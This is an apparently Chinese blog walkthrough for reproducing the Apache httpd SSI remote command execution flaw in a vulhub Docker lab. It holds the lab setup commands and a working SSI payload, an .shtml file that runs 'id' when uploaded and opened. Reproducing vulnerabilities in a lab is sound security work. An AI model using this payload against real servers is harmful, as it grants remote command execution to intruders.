实验环境:Ubuntu
一、vulhub官网找到漏洞路径:
二、启动测试环境
测试环境vulhub搭建:
(241条消息) 部署vulhub漏洞测试环境(靶场,用于漏洞复现搭建环境)_net1996的博客-CSDN博客
进入漏洞目录:
cd vulhub/httpd/ssi-rce
启动测试环境:
docker-compose up -d
(遇到错误可以重启机器试试)
三、漏洞复现
(1)启动环境后访问
http://ip
地址:8080/upload.php,即可看到一个上传表单。
(2)上传一个
shell.shtml
文件
<!–#exec cmd=”id” –>
(3)浏览器访问上传的文件,下图可以看到成功执行代码,说明存在远程命令执行漏洞
版权声明:本文为m0_57028135原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。